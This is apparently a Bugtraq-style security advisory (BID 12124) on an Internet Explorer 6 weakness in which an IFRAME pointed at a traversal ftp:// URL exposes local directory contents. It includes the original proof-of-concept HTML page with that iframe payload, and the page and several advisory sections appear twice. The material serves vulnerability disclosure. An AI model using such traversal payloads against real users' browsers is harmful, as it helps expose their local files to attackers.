Microsoft Internet Explorer FTP Protocol Handler Local File Disclosure Weakness
BID:12124
Info
Microsoft Internet Explorer FTP Protocol Handler Local File Disclosure Weakness
| Bugtraq ID: | 12124 |
| Class: | Design Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Dec 29 2004 12:00AM |
| Updated: | Dec 29 2004 12:00AM |
| Credit: | Discovery is credited to Gregory Panakkal. |
| Vulnerable: |
Microsoft Internet Explorer 6.0 SP1 Microsoft Internet Explorer 6.0 |
| Not Vulnerable: | |
Discussion
Microsoft Internet Explorer FTP Protocol Handler Local File Disclosure Weakness
Microsoft Internet Explorer contains a weakness that may allow remote attackers to disclose directory contents on the local system. This issue may be combined with other vulnerabilities to disclose sensitive information or reference previously placed malicious files on the system.
It is reported that this issue may be triggered by employing the 'SRC' attribute of an IFRAME combined with the 'ftp://' protocol handler. It should be noted that an attacker must be able to reference properties of the IFRAME remotely to carry out this attack. This may be accomplished by exploiting a zone bypass type of vulnerability.
Another attack scenario could involve an attacker placing a malicious file on a vulnerable system and then using this technique to determine the location of the file.
Microsoft Internet Explorer contains a weakness that may allow remote attackers to disclose directory contents on the local system. This issue may be combined with other vulnerabilities to disclose sensitive information or reference previously placed malicious files on the system.
It is reported that this issue may be triggered by employing the 'SRC' attribute of an IFRAME combined with the 'ftp://' protocol handler. It should be noted that an attacker must be able to reference properties of the IFRAME remotely to carry out this attack. This may be accomplished by exploiting a zone bypass type of vulnerability.
Another attack scenario could involve an attacker placing a malicious file on a vulnerable system and then using this technique to determine the location of the file.
Exploit / POC
Microsoft Internet Explorer FTP Protocol Handler Local File Disclosure Weakness
An exploit is not required.
The following proof of concept is available:
<html>
<head>
<META NAME="COPYRIGHT" CONTENT="JunkCode">
<META NAME="CATEGORY" CONTENT="Freeware Utilities">
<META NAME="SITEINFO" CONTENT="http://crapware.lx.ro">
<META NAME="REVISIT-AFTER"CONTENT="5"days>
<META NAME="AUTHOR"CONTENT="JunkCode">
<META NAME="DESCRIPTION"CONTENT="Contains Freeware Utilities ( PEncrypt, ELFCrypt, Stealth Keyloggers, Trojans, Servers, Password Decryptors, Port Scanner etc... ), Useful Articles, Tutorials, Source Code etc..">
<META NAME="KEYWORDS"CONTENT="Utility, Program, Freeware, Shareware, Adware, Nagware, LCC Win32, Programming, C, C++, Java, Visual C++, Visual Basic, VBScript, JavaScript, CGI, Script, Free, Key Logger, Key Capture, Key Trap, Media, Player, MP3, WAV, AU, MP3Pro, MOV, AVI, MPEG, MPG, Explorer, Norton, Commander, Playlist Editor, Editor, Security, Software, Wrapper, Encryption, Self Extracble, Virus, Virii, Polymorphic, Stealth Keylogger, Stealth, Hidden, Fast, Compact, FP, Fronpage, Frontpage, Many, Microsoft, Sone, There, Those, UNIX, UPLOAD, WindowsNT, agains, also, directories, download, enabled, even, example, extensions, files, holes, horrible, let, list, lot, many, only, others, own, password, running, security, server, sites, vulnerabilities, while, work, Anonymity, privacy, TAZ, encryption,Internet, remailer, remailers, Mixmaster, nymserver, PGP, Proxys, WWW remailing, Mail2News, remailer tools, Paranoia, freedom.net, SSH, Onion Routing, Crowds, ACLU, Enemy of the State, MI5, MI6, Echelon, Anonymous surfing tools, NSA, idenity privacy, nym, EPIC, EFF, AAAS, SAIC, Anonymizer, DHP, CSE, attrition.org, freedom, Big Brother,Privacy International, ZKS, ZKS.net, anonymous, Cypherpunk, Type I, nowhere, Steganography, S-Tools, securenym, hushmail, mixfit, free,using cgi,how to use cgi-bin,how to use cgi,what is cgi,what is cgi,how do i use cgi,using perl scripts,how to use ssi,what is ssi,server side includes,server-side,SSI,severs,serves,common gateway interface,cgibin,cig,scrips,scritps,hosted,host,webmaster,help,unix,IIS,tutorial,instructions,guide,perl,on the fly,NT servers,bestdam,bestdamn,best damn,logger,traffic monitor,page counter,log hits,statistics,web logs,hit counts,hit counter,page statistics,track visitors,visitor count,page hits,hit information,auto e-mail,visitor information,scripts,perl,perl script,cgi-perl,cgi,web hosting,isp,what is cgi-bin,nt,host provider,analyze,analysis,tool,columns,columnar,traffic,webmaster,audit,unix,linux,best dam,NT Server,Windows NT,tutorial,guide,viewer,pearl,conts,conter,vistor,freeware download,server,shareware,keith parkansky,parkansky,keith,patch maker, ICQ, Pager, HTML, encrypt, crypt, CHTML, encode, decode, xor, decrypt, script, kiddie, crackme, cracker, procdump, unpacker, tools, w32intro, softice, anti, debugger, disassembler, w32dasm, pe, encryptor, packer, unpacker, PCGUARD, cryptor, war, northadamus, usa, britain, uk, president, bush, tony, blair, prime, minister, taliban, osama, bin, laden, osama bin laden, al, qaeda, terror, terrorists, WTC, world trade centre, attacks, PEncrypt v4.0, packers, trw2000, softice, trw, unpacker, crash">
<META NAME="ROBOTS"CONTENT="INDEX,FOLLOW">
</head>
<body>
<p align="center"><b><font face="Comic Sans MS"><u>Bypassing IE6-SP1
"file://" protection using "ftp://" !!</u></font></b></p>
<p align="center"><b>Discovered by : Gregory R. Panakkal / junkcode / viper31337</b></p>
<p align="left">Tested on : Windows 2000 SP4 - [NTFS], IE 6 SP1 up-to-date as
per windowsupdate.com</p>
<p align="left">Exploit : If you are able to see the contents of C:\ in the
iframe below, then you are vulnerable.. </p>
<p align="left">[Info : Liu Die Yu tested on WinXP SP2 & Win2003, but
the exploit failed.]</p>
<p align="left"> </p>
<iframe src="ftp://:../../../../../../../../../../../"></iframe>
</body>
</html>
<title>
<!-- to remove the dumb lx.ro ads -->
<center>
<!-- Start of StatCounter Code -->
<script type="text/javascript" language="javascript">
var sc_project=347052;
var sc_partition=1;
var sc_invisible=1;
</script>
<script type="text/javascript" language="javascript" src="http://www.statcounter.com/counter/counter.js"></script><noscript><a href="http://www.statcounter.com/" target="_blank"><img src="http://c2.statcounter.com/counter.php?sc_project=347052&java=0&invisible=1" alt="free website hit counter" border="0"></a> </noscript>
<!-- End of StatCounter Code -->
<table border="0" style="border:1px solid #ccc;" cellpadding="1" cellspacing="2"><tr><td style="background-color: #eee;color:#333;font:normal normal 300 1em sans-serif">Sit gazduit de <a href="http://www.lx.ro"><font color="blue">LX.Ro</font></a>. Vrei sa ai si tu situl tau? Click <a href="http://www.lx.ro/contnou.php"><font color="blue">aici</font></a>!
</td></tr></table>
</center>
An exploit is not required.
The following proof of concept is available:
<html>
<head>
<META NAME="COPYRIGHT" CONTENT="JunkCode">
<META NAME="CATEGORY" CONTENT="Freeware Utilities">
<META NAME="SITEINFO" CONTENT="http://crapware.lx.ro">
<META NAME="REVISIT-AFTER"CONTENT="5"days>
<META NAME="AUTHOR"CONTENT="JunkCode">
<META NAME="DESCRIPTION"CONTENT="Contains Freeware Utilities ( PEncrypt, ELFCrypt, Stealth Keyloggers, Trojans, Servers, Password Decryptors, Port Scanner etc... ), Useful Articles, Tutorials, Source Code etc..">
<META NAME="KEYWORDS"CONTENT="Utility, Program, Freeware, Shareware, Adware, Nagware, LCC Win32, Programming, C, C++, Java, Visual C++, Visual Basic, VBScript, JavaScript, CGI, Script, Free, Key Logger, Key Capture, Key Trap, Media, Player, MP3, WAV, AU, MP3Pro, MOV, AVI, MPEG, MPG, Explorer, Norton, Commander, Playlist Editor, Editor, Security, Software, Wrapper, Encryption, Self Extracble, Virus, Virii, Polymorphic, Stealth Keylogger, Stealth, Hidden, Fast, Compact, FP, Fronpage, Frontpage, Many, Microsoft, Sone, There, Those, UNIX, UPLOAD, WindowsNT, agains, also, directories, download, enabled, even, example, extensions, files, holes, horrible, let, list, lot, many, only, others, own, password, running, security, server, sites, vulnerabilities, while, work, Anonymity, privacy, TAZ, encryption,Internet, remailer, remailers, Mixmaster, nymserver, PGP, Proxys, WWW remailing, Mail2News, remailer tools, Paranoia, freedom.net, SSH, Onion Routing, Crowds, ACLU, Enemy of the State, MI5, MI6, Echelon, Anonymous surfing tools, NSA, idenity privacy, nym, EPIC, EFF, AAAS, SAIC, Anonymizer, DHP, CSE, attrition.org, freedom, Big Brother,Privacy International, ZKS, ZKS.net, anonymous, Cypherpunk, Type I, nowhere, Steganography, S-Tools, securenym, hushmail, mixfit, free,using cgi,how to use cgi-bin,how to use cgi,what is cgi,what is cgi,how do i use cgi,using perl scripts,how to use ssi,what is ssi,server side includes,server-side,SSI,severs,serves,common gateway interface,cgibin,cig,scrips,scritps,hosted,host,webmaster,help,unix,IIS,tutorial,instructions,guide,perl,on the fly,NT servers,bestdam,bestdamn,best damn,logger,traffic monitor,page counter,log hits,statistics,web logs,hit counts,hit counter,page statistics,track visitors,visitor count,page hits,hit information,auto e-mail,visitor information,scripts,perl,perl script,cgi-perl,cgi,web hosting,isp,what is cgi-bin,nt,host provider,analyze,analysis,tool,columns,columnar,traffic,webmaster,audit,unix,linux,best dam,NT Server,Windows NT,tutorial,guide,viewer,pearl,conts,conter,vistor,freeware download,server,shareware,keith parkansky,parkansky,keith,patch maker, ICQ, Pager, HTML, encrypt, crypt, CHTML, encode, decode, xor, decrypt, script, kiddie, crackme, cracker, procdump, unpacker, tools, w32intro, softice, anti, debugger, disassembler, w32dasm, pe, encryptor, packer, unpacker, PCGUARD, cryptor, war, northadamus, usa, britain, uk, president, bush, tony, blair, prime, minister, taliban, osama, bin, laden, osama bin laden, al, qaeda, terror, terrorists, WTC, world trade centre, attacks, PEncrypt v4.0, packers, trw2000, softice, trw, unpacker, crash">
<META NAME="ROBOTS"CONTENT="INDEX,FOLLOW">
</head>
<body>
<p align="center"><b><font face="Comic Sans MS"><u>Bypassing IE6-SP1
"file://" protection using "ftp://" !!</u></font></b></p>
<p align="center"><b>Discovered by : Gregory R. Panakkal / junkcode / viper31337</b></p>
<p align="left">Tested on : Windows 2000 SP4 - [NTFS], IE 6 SP1 up-to-date as
per windowsupdate.com</p>
<p align="left">Exploit : If you are able to see the contents of C:\ in the
iframe below, then you are vulnerable.. </p>
<p align="left">[Info : Liu Die Yu tested on WinXP SP2 & Win2003, but
the exploit failed.]</p>
<p align="left"> </p>
<iframe src="ftp://:../../../../../../../../../../../"></iframe>
</body>
</html>
<title>
<!-- to remove the dumb lx.ro ads -->
<center>
<!-- Start of StatCounter Code -->
<script type="text/javascript" language="javascript">
var sc_project=347052;
var sc_partition=1;
var sc_invisible=1;
</script>
<script type="text/javascript" language="javascript" src="http://www.statcounter.com/counter/counter.js"></script><noscript><a href="http://www.statcounter.com/" target="_blank"><img src="http://c2.statcounter.com/counter.php?sc_project=347052&java=0&invisible=1" alt="free website hit counter" border="0"></a> </noscript>
<!-- End of StatCounter Code -->
<table border="0" style="border:1px solid #ccc;" cellpadding="1" cellspacing="2"><tr><td style="background-color: #eee;color:#333;font:normal normal 300 1em sans-serif">Sit gazduit de <a href="http://www.lx.ro"><font color="blue">LX.Ro</font></a>. Vrei sa ai si tu situl tau? Click <a href="http://www.lx.ro/contnou.php"><font color="blue">aici</font></a>!
</td></tr></table>
</center>
Solution / Fix
Microsoft Internet Explorer FTP Protocol Handler Local File Disclosure Weakness
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
Microsoft Internet Explorer FTP Protocol Handler Local File Disclosure Weakness
References:
References: